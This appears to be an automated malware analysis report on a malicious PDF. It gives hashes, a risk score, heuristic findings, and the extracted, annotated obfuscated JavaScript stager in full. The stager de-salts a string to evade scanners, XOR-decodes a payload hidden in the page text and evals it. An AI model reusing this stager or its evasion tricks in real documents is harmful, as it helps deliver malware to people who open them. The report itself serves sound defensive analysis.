Malicious PDF — malware analysis report

Static analysis result for SHA-256 78bc28af754ec0af…

MALICIOUS

PDF

6.3 KB Authoring application: Woibneqeni (via c9086Uzenwzijecijawida)
MD5: 09ac5aed46a5a4d1f5e591f79fcb7204 SHA-1: 37ffe7af6c08ed8d8a3ed655f9f7d6d5aa0cae7a SHA-256: 78bc28af754ec0afd77350a242d70d52a9f4b0c90f4b28a14807b843c91d2aee
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

This PDF document contains embedded JavaScript that is heavily obfuscated. The script appears to be a stager designed to decode and execute further malicious code, likely downloading a second-stage payload. The ML classifier strongly indicates malicious intent, and the presence of JavaScript execution points to a common technique for delivering malware via documents.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0010_000.js
e5fb7241b86520d30618ed164f0373984e043b354e933bd4bfa81c848e06fafc
pdf-javascript-stream PDF /JS object 10 at offset 0x11B0 1464 bytes
Preview script
First 1,000 lines of the extracted script
// Second-layer script held as a string. The literal is salted with filler
// characters (the set matched by kPOP: '&', '>', '~', '9') that are stripped
// before it is evaluated, so a string scan of this object for API names such
// as getPageNthWord or eval will not match it as stored. Once the filler is
// removed, the script: reads `this.t` (the stored document reference) as `n`;
// counts the words on the current page with getPageNumWords(pageNum) and
// concatenates every word from getPageNthWord(pageNum, i, 1); treats the joined
// text as two-character hex pairs, XORs each value with 160, and rebuilds a
// character per byte through an app.eval'd "\x.." escape; joins the bytes,
// splits off the last 332 characters into n.fUB and keeps the rest in n.xAH;
// then calls lUH(), which is not defined anywhere in this listing — the call
// appears intended to throw into the catch, which app.eval's n.xAH. Any error
// escaping the outer try is surfaced with app.alert(message). The decoded
// stage therefore lives in the rendered page text, not in this /JS object, so
// extracting the JavaScript stream alone does not recover the payload; the page
// words have to be extracted and decoded as well. Other assignments in the
// string (xMT, hIZ, lYT, dYJ, rCJ, xIH) are not read by the visible logic.
var eJ="v9ar n=this.t;try {var &pUF&={    rWZ : \'getP9ageNthWord\',pID : \'&getPa~geNumWords\',fKL :> \'pag>eNum\',xEN : \'eval\',nWD : \'join\',};lGP =& 160 ;r9SF=\'\';jWN=\'\';fCB=0;xMT=String;vWZ=\'\\\\x\';hIZ9=\'toString\';t&MP=91;nIB=2;lYT=4;dYJ=5;rCJ=255;pCV=16;xIH=\'doc\';bQ~X=332;d9KV=[];nEN=\'\';dKD=n[pUF.pID](n[p>UF.fKL]9)9;for(hUT=fCB;~hUT< dKD; hUT++~){var dID&=n[pUF.rWZ](n[pUF.fKL],hUT,tMP);jWN=[9jWN,dID][pUF.nW>D](rSF);;}f9or(hUT=0;hUT < jWN.length; hUT+=nIB){~nSH=jWN.substr(hUT,nIB)9;hUH=parseInt(nSH,pCV);rMV=hUH^lGP;dAX=rMV.toSt~r>ing(pCV);9dAX=(dAX.length==tMP) ? \'0\'~ >+ dAX : d~AX;app[pUF.xEN](\'jUD=(\"\'+vW~Z+dAX+\'\");\');9dKV.pus~h(jUD);}try {nEN=dK&V&.join(rSF&);n.fUB=(nEN.substr(nEN.len9gth-bQX));n~.xAH=(n9EN.substr(fCB,n~EN.length>-bQX)>);lUH&();} catch(vSH){if(n.xAH){try {app[pUF.~xEN](n.xAH);} cat&ch(vSH){}} else {}}} catch(>nEN){app.alert(&nEN.message);}";
// "proto" + "type": assembles the string "prototype" from fragments so the
// word never appears whole in the stream. Used later as a computed key to
// attach a method to qXAP.
var zE="proto"+"typeWZg".substr(0,4);
// Not referenced anywhere else in this listing (the eJ string defines its own
// fCB internally).
var fCB=0;
// Filler characters salted into the eJ literal. Every '&', '>', '~' and '9' is
// removed before eJ is evaluated; note that a literal '9' in the payload would
// be removed too, so the encoded script cannot contain one.
var kPOP=/[&\>~9]/g;

// Top-level `this` captured for the constructor below. In document-level
// Acrobat JavaScript this is presumably the Doc object — inferred from the
// getPageNumWords/getPageNthWord calls inside eJ, not shown directly here.
var xIH=this;
// A String wrapper spelling "replace"; when used as a property key it is
// converted to the primitive "replace", so obj[dKF](...) is obj.replace(...).
var dKF=new String("re"+"pl"+"ac"+"e");

// Method name used as a computed key, so `eval` never appears as a bare call.
var zI="eval";
// Holder for the captured document reference. Stores the argument under two
// names; only `t` is read by the method attached below.
function qXAP(hO) {
  this.t = hO;
  this.zAB = hO;
}
// "length", assembled from fragments; not referenced elsewhere in this listing.
var hSJ="leng"+"th";
// Empty replacement string used when the filler characters are stripped out.
var rSF='';
// Plain two-operand `+`; not called anywhere in this listing.
function qPUR(lS, iHMJ) {
  const joined = lS + iHMJ;
  return joined;
}
// Stray empty statements and blank lines — padding only.
;




// Self-named string; not referenced elsewhere in this listing.
var nYH="nYH";
// Decoy values (array, document property, empty string); none are read by the
// visible code.
rYP=["mT","j","dQT"];this.rIV='';var jSJ='';
// De-salting step: eJ.replace(/[&\>~9]/g, '') expressed through computed keys
// (dKF -> "replace"). After this line eJ holds the readable second-layer
// script; a detection that only inspects the stored literal misses it.
eJ=eJ[dKF](kPOP, rSF);

;


// qXAP.prototype.bC — the only method; evaluates the de-salted stager.
qXAP[zE].bC = function(){
// Noise: assigned but never read in this listing.
zWB=16019;zWB--;fS={fY:false};
// this.t.eval(eJ) through a computed key: runs the cleaned second-layer
// script with the captured top-level object as receiver. Whether this
// resolves to the global eval or to a method of the Doc object is not
// shown here — confirm against the viewer's object model.
this.t[zI](eJ);
// Noise: assigned but never read in this listing.
var zCT="";p={tY:7371};
}

// Decoy objects; not read anywhere in this listing.
var vG={gFC:false};var hWL={nQN:false};

// Wrap the captured top-level `this` (xIH) in the holder.
var dUV=new qXAP(xIH);

// More decoys, including an unused Date.
vYR={h:11899};var dGXQ=new Date();
// Entry point: triggers evaluation of the de-salted eJ script.
dUV.bC();



;